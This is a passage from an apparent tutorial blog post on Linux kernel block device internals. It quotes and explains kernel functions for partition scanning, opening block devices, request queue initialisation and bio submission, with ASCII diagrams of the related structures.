bdev->bd_holders++;
bdev->bd_holder = holder;
}
/* tell others that we're done */
BUG_ON(whole->bd_claiming != holder);
whole->bd_claiming = NULL;
wake_up_bit(&whole->bd_claiming, 0);
spin_unlock(&bdev_lock);
/*
* Block event polling for write claims if requested. Any
* write holder makes the write_holder state stick until
* all are released. This is good enough and tracking
* individual writeable reference is too fragile given the
* way @mode is used in blkdev_get/put().
*/
if (!res && (mode & FMODE_WRITE) && !bdev->bd_write_holder &&
(disk->flags & GENHD_FL_BLOCK_EVENTS_ON_EXCL_WRITE)) {
bdev->bd_write_holder = true;
disk_block_events(disk);
}
mutex_unlock(&bdev->bd_mutex);
bdput(whole);
}
return res;
}
</code></pre></div></div>
<p>‘__blkdev_get’ is very long. Here we wil go to the first path, as it first calls :</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __blkdev_get(struct block_device *bdev, fmode_t mode, int for_part)
{
struct gendisk *disk;
struct module *owner;
int ret;
int partno;
int perm = 0;
...
ret = -ENXIO;
disk = get_gendisk(bdev->bd_dev, &partno);
if (!disk)
goto out;
owner = disk->fops->owner;
disk_block_events(disk);
mutex_lock_nested(&bdev->bd_mutex, for_part);
if (!bdev->bd_openers) {
bdev->bd_disk = disk;
bdev->bd_queue = disk->queue;
bdev->bd_contains = bdev;
if (!partno) {
struct backing_dev_info *bdi;
ret = -ENXIO;
bdev->bd_part = disk_get_part(disk, partno);
if (!bdev->bd_part)
goto out_clear;
ret = 0;
if (disk->fops->open) {
ret = disk->fops->open(bdev, mode);
if (ret == -ERESTARTSYS) {
/* Lost a race with 'disk' being
* deleted, try again.
* See md.c
*/
disk_put_part(bdev->bd_part);
bdev->bd_part = NULL;
bdev->bd_disk = NULL;
bdev->bd_queue = NULL;
mutex_unlock(&bdev->bd_mutex);
disk_unblock_events(disk);
put_disk(disk);
module_put(owner);
goto restart;
}
}
if (!ret) {
bd_set_size(bdev,(loff_t)get_capacity(disk)<<9);
bdi = blk_get_backing_dev_info(bdev);
if (bdi == NULL)
bdi = &default_backing_dev_info;
bdev_inode_switch_bdi(bdev->bd_inode, bdi);
}
/*
* If the device is invalidated, rescan partition
* if open succeeded or failed with -ENOMEDIUM.
* The latter is necessary to prevent ghost
* partitions on a removed medium.
*/
if (bdev->bd_invalidated) {
if (!ret)
rescan_partitions(disk, bdev);
else if (ret == -ENOMEDIUM)
invalidate_partitions(disk, bdev);
}
if (ret)
goto out_clear;
}
...
bdev->bd_openers++;
if (for_part)
bdev->bd_part_count++;
mutex_unlock(&bdev->bd_mutex);
disk_unblock_events(disk);
return 0;
out_clear:
disk_put_part(bdev->bd_part);
bdev->bd_disk = NULL;
bdev->bd_part = NULL;
bdev->bd_queue = NULL;
bdev_inode_switch_bdi(bdev->bd_inode, &default_backing_dev_info);
if (bdev != bdev->bd_contains)
__blkdev_put(bdev->bd_contains, mode, 1);
bdev->bd_contains = NULL;
out_unlock_bdev:
mutex_unlock(&bdev->bd_mutex);
disk_unblock_events(disk);
put_disk(disk);
module_put(owner);
out:
bdput(bdev);
return ret;
}
</code></pre></div></div>
<p>First get the gendisk, here we see the device number bdev->bd_dev’s usage.
Later, set some of the field of bdev, and ‘bdev->bd_part’ points to ‘disk->part0’.
Then calls ‘disk->fops->open(bdev, mode);’.
Later important function is ‘rescan_partitions’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int rescan_partitions(struct gendisk *disk, struct block_device *bdev)
{
struct parsed_partitions *state = NULL;
struct hd_struct *part;
int p, highest, res;
rescan:
if (state && !IS_ERR(state)) {
free_partitions(state);
state = NULL;
}
res = drop_partitions(disk, bdev);
if (res)
return res;
if (disk->fops->revalidate_disk)
disk->fops->revalidate_disk(disk);
check_disk_size_change(disk, bdev);
bdev->bd_invalidated = 0;
if (!get_capacity(disk) || !(state = check_partition(disk, bdev)))
return 0;
if (IS_ERR(state)) {
/*
* I/O error reading the partition table. If any
* partition code tried to read beyond EOD, retry
* after unlocking native capacity.
*/
if (PTR_ERR(state) == -ENOSPC) {
printk(KERN_WARNING "%s: partition table beyond EOD, ",
disk->disk_name);
if (disk_unlock_native_capacity(disk))
goto rescan;
}
return -EIO;
}
/*
* If any partition code tried to read beyond EOD, try
* unlocking native capacity even if partition table is
* successfully read as we could be missing some partitions.
*/
if (state->access_beyond_eod) {
printk(KERN_WARNING
"%s: partition table partially beyond EOD, ",
disk->disk_name);
if (disk_unlock_native_capacity(disk))
goto rescan;
}
/* tell userspace that the media / partition table may have changed */
kobject_uevent(&disk_to_dev(disk)->kobj, KOBJ_CHANGE);
/* Detect the highest partition number and preallocate
* disk->part_tbl. This is an optimization and not strictly
* necessary.
*/
for (p = 1, highest = 0; p < state->limit; p++)
if (state->parts[p].size)
highest = p;
disk_expand_part_tbl(disk, highest);
/* add partitions */
for (p = 1; p < state->limit; p++) {
sector_t size, from;
struct partition_meta_info *info = NULL;
size = state->parts[p].size;
if (!size)
continue;
from = state->parts[p].from;
if (from >= get_capacity(disk)) {
printk(KERN_WARNING
"%s: p%d start %llu is beyond EOD, ",
disk->disk_name, p, (unsigned long long) from);
if (disk_unlock_native_capacity(disk))
goto rescan;
continue;
}
if (from + size > get_capacity(disk)) {
printk(KERN_WARNING
"%s: p%d size %llu extends beyond EOD, ",
disk->disk_name, p, (unsigned long long) size);
if (disk_unlock_native_capacity(disk)) {
/* free state and restart */
goto rescan;
} else {
/*
* we can not ignore partitions of broken tables
* created by for example camera firmware, but
* we limit them to the end of the disk to avoid
* creating invalid block devices
*/
size = get_capacity(disk) - from;
}
}
if (state->parts[p].has_info)
info = &state->parts[p].info;
part = add_partition(disk, p, from, size,
state->parts[p].flags,
&state->parts[p].info);
if (IS_ERR(part)) {
printk(KERN_ERR " %s: p%d could not be added: %ld\n",
disk->disk_name, p, -PTR_ERR(part));
continue;
}
#ifdef CONFIG_BLK_DEV_MD
if (state->parts[p].flags & ADDPART_FLAG_RAID)
md_autodetect_dev(part_to_dev(part)->devt);
#endif
}
free_partitions(state);
return 0;
}
</code></pre></div></div>
<p>It calls ‘check_partition’. Every partition recognition function is in the globa variable ‘check_part’, if there is no partition in disk, it will print ‘unknown partition table’.
How about if there are partitions in this disk. It will call ‘disk_expand_part_tbl’ to expand ‘gendisk->part_tbl’. Then call ‘add_partition’ to add partition device to the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct hd_struct *add_partition(struct gendisk *disk, int partno,
sector_t start, sector_t len, int flags,
struct partition_meta_info *info)
{
struct hd_struct *p;
dev_t devt = MKDEV(0, 0);
struct device *ddev = disk_to_dev(disk);
struct device *pdev;
struct disk_part_tbl *ptbl;
const char *dname;
int err;
err = disk_expand_part_tbl(disk, partno);
if (err)
return ERR_PTR(err);
ptbl = disk->part_tbl;
if (ptbl->part[partno])
return ERR_PTR(-EBUSY);
p = kzalloc(sizeof(*p), GFP_KERNEL);
if (!p)
return ERR_PTR(-EBUSY);
if (!init_part_stats(p)) {
err = -ENOMEM;
goto out_free;
}
seqcount_init(&p->nr_sects_seq);
pdev = part_to_dev(p);
p->start_sect = start;
p->alignment_offset =
queue_limit_alignment_offset(&disk->queue->limits, start);
p->discard_alignment =
queue_limit_discard_alignment(&disk->queue->limits, start);
p->nr_sects = len;
p->partno = partno;
p->policy = get_disk_ro(disk);
if (info) {
struct partition_meta_info *pinfo = alloc_part_info(disk);
if (!pinfo)
goto out_free_stats;
memcpy(pinfo, info, sizeof(*info));
p->info = pinfo;
}
dname = dev_name(ddev);
if (isdigit(dname[strlen(dname) - 1]))
dev_set_name(pdev, "%sp%d", dname, partno);
else
dev_set_name(pdev, "%s%d", dname, partno);
device_initialize(pdev);
pdev->class = &block_class;
pdev->type = &part_type;
pdev->parent = ddev;
err = blk_alloc_devt(p, &devt);
if (err)
goto out_free_info;
pdev->devt = devt;
/* delay uevent until 'holders' subdir is created */
dev_set_uevent_suppress(pdev, 1);
err = device_add(pdev);
if (err)
goto out_put;
err = -ENOMEM;
p->holder_dir = kobject_create_and_add("holders", &pdev->kobj);
if (!p->holder_dir)
goto out_del;
dev_set_uevent_suppress(pdev, 0);
if (flags & ADDPART_FLAG_WHOLEDISK) {
err = device_create_file(pdev, &dev_attr_whole_disk);
if (err)
goto out_del;
}
/* everything is up and running, commence */
rcu_assign_pointer(ptbl->part[partno], p);
/* suppress uevent if the disk suppresses it */
if (!dev_get_uevent_suppress(ddev))
kobject_uevent(&pdev->kobj, KOBJ_ADD);
hd_ref_init(p);
return p;
out_free_info:
free_part_info(p);
out_free_stats:
free_part_stats(p);
out_free:
kfree(p);
return ERR_PTR(err);
out_del:
kobject_put(p->holder_dir);
device_del(pdev);
out_put:
put_device(pdev);
blk_free_devt(devt);
return ERR_PTR(err);
}
</code></pre></div></div>
<p>First allocate a ‘hd_struct’ to contain this partition infomation. Kernel take every partition as a seprate device, so for every ‘add_partition’ will call ‘device_add’ to add partition to system and generate a directory in /dev/, such as /dev/ramhda1, /dev/ramhda2. Notice tehre is no ‘block_device’ for partition.</p>
<p>After call ‘register_disk’ in ‘add_disk’, it calls ‘blk_register_queue’. This function initialize the disk’s request queue.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int blk_register_queue(struct gendisk *disk)
{
int ret;
struct device *dev = disk_to_dev(disk);
struct request_queue *q = disk->queue;
if (WARN_ON(!q))
return -ENXIO;
/*
* Initialization must be complete by now. Finish the initial
* bypass from queue allocation.
*/
blk_queue_bypass_end(q);
queue_flag_set_unlocked(QUEUE_FLAG_INIT_DONE, q);
ret = blk_trace_init_sysfs(dev);
if (ret)
return ret;
ret = kobject_add(&q->kobj, kobject_get(&dev->kobj), "%s", "queue");
if (ret < 0) {
blk_trace_remove_sysfs(dev);
return ret;
}
kobject_uevent(&q->kobj, KOBJ_ADD);
if (q->mq_ops)
blk_mq_register_disk(disk);
if (!q->request_fn)
return 0;
ret = elv_register_queue(q);
if (ret) {
kobject_uevent(&q->kobj, KOBJ_REMOVE);
kobject_del(&q->kobj);
blk_trace_remove_sysfs(dev);
kobject_put(&dev->kobj);
return ret;
}
return 0;
}
</code></pre></div></div>
<p>Though it seems that this queue is related to the device requests, here we just see its initialization is doing something with the standard device model.</p>
<p>So after ‘add_disk’ add the disk to system. The following struct has been created.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> block_de^ice
+---------------+ <--+
+--------------------------------------+ bd_part | |
| +---------------+ |
| +-------------------------+ bd_disk | |
| | +---------------+ |
| | | bd_contains +----+
| | +---------------|
| | |bd_iinvalidated=0
| | +---------------+
| | |bd_openers=1 |
| | +---------------+
| |
| |
| |
| |
| v
| gendisk
| +-------------------+
| | |
| +-------------------+ disk_part_tbl
| | *part_tbl +------------> +---------------+
| +-------------------+ | |
| | | +---------------+
| | | | len |
| | | +---------------+
| | | | |
| | | +---------------+
+---------> +-------------------+ <------------+ *part[0] |
part0 | start_sect | +---------------+ hd_struct
+-------------------+ | *part[1] +----------> +---------------+
| nr_sects | +---------------+ | start_sect |
+-------------------+ +---------------+
| __dev | | nr_sects |
+-------------------+ +---------------+
| partno=0 | | partno=1 |
+-------------------+ +---------------+
| | | |
| | +---------------+
| |
| |
+-------------------+
</code></pre></div></div>
<h3 id="open-block-device">open block device</h3>
<p>When we add devices to system, a node in /dev/ will be created, this is done in ‘devtmpfs_create_node’. This node is created by the devtmpfs and when create the inode, ‘init_special_inode’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void init_special_inode(struct inode *inode, umode_t mode, dev_t rdev)
{
inode->i_mode = mode;
if (S_ISCHR(mode)) {
inode->i_fop = &def_chr_fops;
inode->i_rdev = rdev;
} else if (S_ISBLK(mode)) {
inode->i_fop = &def_blk_fops;
inode->i_rdev = rdev;
} else if (S_ISFIFO(mode))
inode->i_fop = &pipefifo_fops;
else if (S_ISSOCK(mode))
inode->i_fop = &bad_sock_fops;
else
printk(KERN_DEBUG "init_special_inode: bogus i_mode (%o) for"
" inode %s:%lu\n", mode, inode->i_sb->s_id,
inode->i_ino);
}
</code></pre></div></div>
<p>So inode’s i_fop’ will be ‘def_blk_fops’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const struct file_operations def_blk_fops = {
.open = blkdev_open,
.release = blkdev_close,
.llseek = block_llseek,
.read = do_sync_read,
.write = do_sync_write,
.aio_read = blkdev_aio_read,
.aio_write = blkdev_aio_write,
.mmap = generic_file_mmap,
.fsync = blkdev_fsync,
.unlocked_ioctl = block_ioctl,
#ifdef CONFIG_COMPAT
.compat_ioctl = compat_blkdev_ioctl,
#endif
.splice_read = generic_file_splice_read,
.splice_write = generic_file_splice_write,
};
</code></pre></div></div>
<p>When this block device such as /dev/ramhda is opened, ‘blkdev_open’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int blkdev_open(struct inode * inode, struct file * filp)
{
struct block_device *bdev;
/*
* Preserve backwards compatibility and allow large file access
* even if userspace doesn't ask for it explicitly. Some mkfs
* binary needs it. We might want to drop this workaround
* during an unstable branch.
*/
filp->f_flags |= O_LARGEFILE;
if (filp->f_flags & O_NDELAY)
filp->f_mode |= FMODE_NDELAY;
if (filp->f_flags & O_EXCL)
filp->f_mode |= FMODE_EXCL;
if ((filp->f_flags & O_ACCMODE) == 3)
filp->f_mode |= FMODE_WRITE_IOCTL;
bdev = bd_acquire(inode);
if (bdev == NULL)
return -ENOMEM;
filp->f_mapping = bdev->bd_inode->i_mapping;
return blkdev_get(bdev, filp->f_mode, filp);
}
</code></pre></div></div>
<p>This function does two thing, get the ‘block_device’ bdev using ‘bd_acquire’ and call ‘blkdev_get’ function.
‘bd_acquire’ will return an exist ‘block_device’ if open the whole disk, otherwise it will create a new ‘block_device’ to return. Any way, after, ‘bd_acquire’ return a ‘block_device’.
The next function is ‘blkdev_get’. This function was discussed before. It calls ‘__blkdev_get’. This time we will discuss the differenct path. We will use opening a partition of a disk as an example, this time the partno is 1.
First get the gendisk in ‘__blkdev_get’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (!bdev->bd_openers) {
bdev->bd_disk = disk;
bdev->bd_queue = disk->queue;
bdev->bd_contains = bdev;
...
struct block_device *whole;
whole = bdget_disk(disk, 0);
ret = -ENOMEM;
if (!whole)
goto out_clear;
BUG_ON(for_part);
ret = __blkdev_get(whole, mode, 1);
if (ret)
goto out_clear;
bdev->bd_contains = whole;
bdev_inode_switch_bdi(bdev->bd_inode,
whole->bd_inode->i_data.backing_dev_info);
bdev->bd_part = disk_get_part(disk, partno);
if (!(disk->flags & GENHD_FL_UP) ||
!bdev->bd_part || !bdev->bd_part->nr_sects) {
ret = -ENXIO;
goto out_clear;
}
bd_set_size(bdev, (loff_t)bdev->bd_part->nr_sects << 9);
}
</code></pre></div></div>
<p>Then get the gendisk’s block_device and assign it to ‘whole’. ‘Whole’ later assign to ‘bdev->bd_contains’.
Then call ‘__blkdev_get(whole, mode, 1);’ This goes to here:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
if (bdev->bd_contains == bdev) {
ret = 0;
if (bdev->bd_disk->fops->open)
ret = bdev->bd_disk->fops->open(bdev, mode);
/* the same as first opener case, read comment there */
if (bdev->bd_invalidated) {
if (!ret)
rescan_partitions(bdev->bd_disk, bdev);
else if (ret == -ENOMEDIUM)
invalidate_partitions(bdev->bd_disk, bdev);
}
if (ret)
goto out_unlock_bdev;
}
</code></pre></div></div>
<p>Mostly call the ‘bd_disk->fops->open’.
So here we can see, every disk has a ‘block_device’ and it is created when the ‘add_disk’ is called. For the partition, the kernel doesn’t create ‘block_device’ when detecting it and insert it to system, it is created when the partition is opened.
Following pic show the partition’s ‘device_block’ and the gendisk’s ‘device_block’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> block_de^ice
+---------------+ <--+ <-----------------------------------+
+--------------------------------------+ bd_part | | |
| +---------------+ | |
| +-------------------------+ bd_disk | | |
| | +---------------+ | |
| | | bd_contains +----+ |
| | +---------------+ |
| | |bd_iin^alidated=0 |
| | +---------------+ |
| | |bd_openers=1 | block_de^ice |
| | +---------------+ +---------------+ |
| | +----+ bd_part | |
| | | +---------------+ |
| | +---------------------------------------+ bd_disk | |
| | | | +---------------+ |
| v v | | bd_contains +--------+
| gendisk | +---------------+
| +-------------------+ | |bd_iin^alidated=
| | | | +---------------+
| +-------------------+ disk_part_tbl | |bd_openers=1 |
| | *part_tbl +------------> +---------------+ | +---------------+
| +-------------------+ | | |
| | | +---------------+ |
| | | | len | |
| | | +---------------+ |
| | | | | +-------+
| | | +---------------+ |
+---------> +-------------------+ <------------+ *part[0] | v
part0 | start_sect | +---------------+ hd_struct
+-------------------+ | *part[1] +----------> +---------------+
| nr_sects | +---------------+ | start_sect |
+-------------------+ +---------------+
| __de^ | | nr_sects |
+-------------------+ +---------------+
| partno=0 | | partno=1 |
+-------------------+ +---------------+
| | | |
| | +---------------+
| |
| |
+-------------------+
</code></pre></div></div>
<h3 id="blk_init_queue">blk_init_queue</h3>
<p>The block device need a queue to contain the data request from the file system. And also a funtion to handle every request in the queue. There are two methods called ‘request’ and ‘make request’ to handle this. We first discuss the ‘request’ method.
When using ‘request’, the block device driver has to allocate a request queue by calling ‘blk_init_queue’. The driver needs to implement a request handler function and pass this to ‘blk_init_queue’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct request_queue *blk_init_queue(request_fn_proc *rfn, spinlock_t *lock)
{
return blk_init_queue_node(rfn, lock, NUMA_NO_NODE);
}
struct request_queue *
blk_init_queue_node(request_fn_proc *rfn, spinlock_t *lock, int node_id)
{
struct request_queue *uninit_q, *q;
uninit_q = blk_alloc_queue_node(GFP_KERNEL, node_id);
if (!uninit_q)
return NULL;
q = blk_init_allocated_queue(uninit_q, rfn, lock);
if (!q)
blk_cleanup_queue(uninit_q);
return q;
}
typedef void (request_fn_proc) (struct request_queue *q);
struct 'request\_queue' represents a request queue. It is a very complicated structure.
struct request_queue {
/*
* Together with queue_head for cacheline sharing
*/
struct list_head queue_head;
struct request *last_merge;
struct elevator_queue *elevator;
int nr_rqs[2]; /* # allocated [a]sync rqs */
int nr_rqs_elvpriv; /* # allocated rqs w/ elvpriv */
/*
* If blkcg is not used, @q->root_rl serves all requests. If blkcg
* is used, root blkg allocates from @q->root_rl and all other
* blkgs from their own blkg->rl. Which one to use should be
* determined using bio_request_list().
*/
struct request_list root_rl;
request_fn_proc *request_fn;
make_request_fn *make_request_fn;
prep_rq_fn *prep_rq_fn;
unprep_rq_fn *unprep_rq_fn;
merge_bvec_fn *merge_bvec_fn;
softirq_done_fn *softirq_done_fn;
rq_timed_out_fn *rq_timed_out_fn;
dma_drain_needed_fn *dma_drain_needed;
lld_busy_fn *lld_busy_fn;
struct blk_mq_ops *mq_ops;
unsigned int *mq_map;
/* sw queues */
struct blk_mq_ctx *queue_ctx;
unsigned int nr_queues;
/* hw dispatch queues */
struct blk_mq_hw_ctx **queue_hw_ctx;
unsigned int nr_hw_queues;
/*
* Dispatch queue sorting
*/
sector_t end_sector;
struct request *boundary_rq;
/*
* Delayed queue handling
*/
struct delayed_work delay_work;
struct backing_dev_info backing_dev_info;
/*
* The queue owner gets to use this for whatever they like.
* ll_rw_blk doesn't touch it.
*/
void *queuedata;
/*
* various queue flags, see QUEUE_* below
*/
unsigned long queue_flags;
...};
</code></pre></div></div>
<p>‘queue_head’ links all of the requests adding to this queue. The link’s element is struct ‘request’ which represents a request. The kernel will reorder or merge requests for performance consideration.
‘request_fn’ is the request handler function the driver implement. When other subsystems need to read or write data from the block device, kernel will this function if the device driver using the ‘request’ method.
‘make_request_fn’. If device driver using ‘blk_init_queue’ to handle request(‘request’ method), kernel will provide a standard function ‘blk_queue_bio’ for this field. If the device driver uses ‘make_request’, it needs to call ‘blk_queue_make_request’ to provide an implementation for this field. ‘blk_queue_make_request’ doesn’t allocate the request queue, so the device driver need call ‘blk_queue_make_request’ to allocate a request queue when using the ‘make_request’ method.
‘queue_flags’ indicate the request queue’s status, for example ‘QUEUE_FLAG_STOPPED’, ‘QUEUE_FLAG_PLUGGED’ and ‘QUEUE_FLAG_QUEUED’ and so on.</p>
<p>Every request is represented by an struct request.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct request {
union {
struct list_head queuelist;
struct llist_node ll_list;
};
union {
struct call_single_data csd;
struct work_struct mq_flush_data;
};
struct request_queue *q;
struct blk_mq_ctx *mq_ctx;
u64 cmd_flags;
enum rq_cmd_type_bits cmd_type;
unsigned long atomic_flags;
int cpu;
/* the following two fields are internal, NEVER access directly */
unsigned int __data_len; /* total data len */
sector_t __sector; /* sector cursor */
struct bio *bio;
struct bio *biotail;
struct hlist_node hash; /* merge hash */
/*
* The rb_node is only used inside the io scheduler, requests
* are pruned when moved to the dispatch queue. So let the
* completion_data share space with the rb_node.
*/
union {
struct rb_node rb_node; /* sort/lookup */
void *completion_data;
};
/*
* Three pointers are available for the IO schedulers, if they need
* more they have to dynamically allocate it. Flush requests are
* never put on the IO scheduler. So let the flush fields share
* space with the elevator data.
*/
union {
struct {
struct io_cq *icq;
void *priv[2];
} elv;
struct {
unsigned int seq;
struct list_head list;
rq_end_io_fn *saved_end_io;
} flush;
};
struct gendisk *rq_disk;
struct hd_struct *part;
unsigned long start_time;
#ifdef CONFIG_BLK_CGROUP
struct request_list *rl; /* rl this rq is alloced from */
unsigned long long start_time_ns;
unsigned long long io_start_time_ns; /* when passed to hardware */
#endif
/* Number of scatter-gather DMA addr+len pairs after
* physical address coalescing is performed.
*/
unsigned short nr_phys_segments;
#if defined(CONFIG_BLK_DEV_INTEGRITY)
unsigned short nr_integrity_segments;
#endif
unsigned short ioprio;
void *special; /* opaque pointer available for LLD use */
char *buffer; /* kaddr of the current segment if available */
int tag;
int errors;
/*
* when request is used as a packet command carrier
*/
unsigned char __cmd[BLK_MAX_CDB];
unsigned char *cmd;
unsigned short cmd_len;
unsigned int extra_len; /* length of alignment and padding */
unsigned int sense_len;
unsigned int resid_len; /* residual count */
void *sense;
unsigned long deadline;
struct list_head timeout_list;
unsigned int timeout;
int retries;
/*
* completion callback.
*/
rq_end_io_fn *end_io;
void *end_io_data;
/* for bidi */
struct request *next_rq;
};
</code></pre></div></div>
<p>‘queuelist’ is used to links this request to struct blk_plug.
‘q’ represents the request queue of this request attached.
‘__data_len’ represents the total bytes this requst requires.
‘__sector’ represents the start sector.
‘bio’ and ‘biotail’. When one bio is traslated or merged to a request, the request links these bio. If the device driver uses ‘make_request’, the device driver can access these bio in the request handler function.</p>
<p>So let’s look at ‘blk_init_queue_node’ function.It calls two functions, as the name indicates alloc and init a queue. ‘blk_alloc_queue_node’ allocates a queue and do some basic initialization. The more initialization work is done in ‘blk_init_allocated_queue’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct request_queue *
blk_init_allocated_queue(struct request_queue *q, request_fn_proc *rfn,
spinlock_t *lock)
{
if (!q)
return NULL;
if (blk_init_rl(&q->root_rl, q, GFP_KERNEL))
return NULL;
q->request_fn = rfn;
q->prep_rq_fn = NULL;
q->unprep_rq_fn = NULL;
q->queue_flags |= QUEUE_FLAG_DEFAULT;
/* Override internal queue lock with supplied lock pointer */
if (lock)
q->queue_lock = lock;
/*
* This also sets hw/phys segments, boundary and size
*/
blk_queue_make_request(q, blk_queue_bio);
q->sg_reserved_size = INT_MAX;
/* Protect q->elevator from elevator_change */
mutex_lock(&q->sysfs_lock);
/* init elevator */
if (elevator_init(q, NULL)) {
mutex_unlock(&q->sysfs_lock);
return NULL;
}
mutex_unlock(&q->sysfs_lock);
return q;
}
</code></pre></div></div>
<p>We can see the assignment of ‘q->request_fn’ and calls of ‘blk_queue_make_request’.
‘blk_queue_bio’ will be used to generate the new requests and finally calls the device driver implement’s ‘request_fn’.
Later is to call ‘elevator_init’. Kernel uses the ‘elevator algorithm’ to schedule the block requests. ‘elevator_init’ chooses a elevator algorithm for queue ‘q’. Here we will not care the detail of which algorithm the kernel uses.
For now, we just need know the ‘blk_init_queue’ allocates and initializes a request queue for the block device, and chooses a schedule algorithm.</p>
<p>For the ‘make_request’ method, the device driver first call ‘blk_alloc_queue’to allocates a request queue and then call ‘blk_queue_make_request’ to assign the self-implementation make_request function to ‘q->make_request_fn’.</p>
<h3 id="submit-requests-to-block-devices">submit requests to block devices</h3>
<p>When the file system need to read or write data from disk, it need to send requests to the device’s request queue, this is done by ‘submit_io’.
‘bio’ contains the request’s detail.
When ‘submit_io’ is called, the struct bio has been created. Here we don’t care how to create a bio but just focus how the block device driver handle it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void submit_bio(int rw, struct bio *bio)
{
bio->bi_rw |= rw;
/*
* If it's a regular read/write or a barrier with data attached,
* go through the normal accounting stuff before submission.
*/
if (bio_has_data(bio)) {
unsigned int count;
if (unlikely(rw & REQ_WRITE_SAME))
count = bdev_logical_block_size(bio->bi_bdev) >> 9;
else
count = bio_sectors(bio);
if (rw & WRITE) {
count_vm_events(PGPGOUT, count);
} else {
task_io_account_read(bio->bi_size);
count_vm_events(PGPGIN, count);
}
if (unlikely(block_dump)) {
char b[BDEVNAME_SIZE];
printk(KERN_DEBUG "%s(%d): %s block %Lu on %s (%u sectors)\n",
current->comm, task_pid_nr(current),
(rw & WRITE) ? "WRITE" : "READ",
(unsigned long long)bio->bi_sector,
bdevname(bio->bi_bdev, b),
count);
}
}
generic_make_request(bio);
}
void generic_make_request(struct bio *bio)
{
struct bio_list bio_list_on_stack;
if (!generic_make_request_checks(bio))
return;
/*
* We only want one ->make_request_fn to be active at a time, else
* stack usage with stacked devices could be a problem. So use
* current->bio_list to keep a list of requests submited by a
* make_request_fn function. current->bio_list is also used as a
* flag to say if generic_make_request is currently active in this
* task or not. If it is NULL, then no make_request is active. If
* it is non-NULL, then a make_request is active, and new requests
* should be added at the tail
*/
if (current->bio_list) {
bio_list_add(current->bio_list, bio);
return;
}
/* following loop may be a bit non-obvious, and so deserves some
* explanation.
* Before entering the loop, bio->bi_next is NULL (as all callers
* ensure that) so we have a list with a single bio.
* We pretend that we have just taken it off a longer list, so
* we assign bio_list to a pointer to the bio_list_on_stack,
* thus initialising the bio_list of new bios to be
* added. ->make_request() may indeed add some more bios
* through a recursive call to generic_make_request. If it
* did, we find a non-NULL value in bio_list and re-enter the loop
* from the top. In this case we really did just take the bio
* of the top of the list (no pretending) and so remove it from
* bio_list, and call into ->make_request() again.
*/
BUG_ON(bio->bi_next);
bio_list_init(&bio_list_on_stack);
current->bio_list = &bio_list_on_stack;
do {
struct request_queue *q = bdev_get_queue(bio->bi_bdev);
q->make_request_fn(q, bio);
bio = bio_list_pop(current->bio_list);
} while (bio);
current->bio_list = NULL; /* deactivate */
}
</code></pre></div></div>
<p>The most work is done by ‘generic_make_request’. First check if the process has request to handle, if it is add this new bio to ‘current->bio_list’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (current->bio_list) {
bio_list_add(current->bio_list, bio);
return;
}
</code></pre></div></div>
<p>Then for every bio, it calls the ‘make_request_fn’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>do {
struct request_queue *q = bdev_get_queue(bio->bi_bdev);
q->make_request_fn(q, bio);
bio = bio_list_pop(current->bio_list);
} while (bio);
</code></pre></div></div>
<p>If the block device driver uses ‘request’, the ‘make_request_fn’ is ‘blk_queue_bio.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void blk_queue_bio(struct request_queue *q, struct bio *bio)
{
const bool sync = !!(bio->bi_rw & REQ_SYNC);
struct blk_plug *plug;
int el_ret, rw_flags, where = ELEVATOR_INSERT_SORT;
struct request *req;
unsigned int request_count = 0;
/*
* low level driver can indicate that it wants pages above a
* certain limit bounced to low memory (ie for highmem, or even
* ISA dma in theory)
*/
blk_queue_bounce(q, &bio);
if (bio_integrity_enabled(bio) && bio_integrity_prep(bio)) {
bio_endio(bio, -EIO);
return;
}
if (bio->bi_rw & (REQ_FLUSH | REQ_FUA)) {
spin_lock_irq(q->queue_lock);
where = ELEVATOR_INSERT_FLUSH;
goto get_rq;
}
/*
* Check if we can merge with the plugged list before grabbing
* any locks.
*/
if (blk_attempt_plug_merge(q, bio, &request_count))
return;
spin_lock_irq(q->queue_lock);
el_ret = elv_merge(q, &req, bio);
if (el_ret == ELEVATOR_BACK_MERGE) {
if (bio_attempt_back_merge(q, req, bio)) {
elv_bio_merged(q, req, bio);
if (!attempt_back_merge(q, req))
elv_merged_request(q, req, el_ret);
goto out_unlock;
}
} else if (el_ret == ELEVATOR_FRONT_MERGE) {
if (bio_attempt_front_merge(q, req, bio)) {
elv_bio_merged(q, req, bio);
if (!attempt_front_merge(q, req))
elv_merged_request(q, req, el_ret);
goto out_unlock;
}
}
get_rq:
/*
* This sync check and mask will be re-done in init_request_from_bio(),
* but we need to set it earlier to expose the sync flag to the
* rq allocator and io schedulers.
*/
rw_flags = bio_data_dir(bio);
if (sync)
rw_flags |= REQ_SYNC;
/*
* Grab a free request. This is might sleep but can not fail.
* Returns with the queue unlocked.
*/
req = get_request(q, rw_flags, bio, GFP_NOIO);
if (unlikely(!req)) {
bio_endio(bio, -ENODEV); /* @q is dead */
goto out_unlock;
}
/*
* After dropping the lock and possibly sleeping here, our request
* may now be mergeable after it had proven unmergeable (above).
* We don't worry about that case for efficiency. It won't happen
* often, and the elevators are able to handle it.
*/
init_request_from_bio(req, bio);
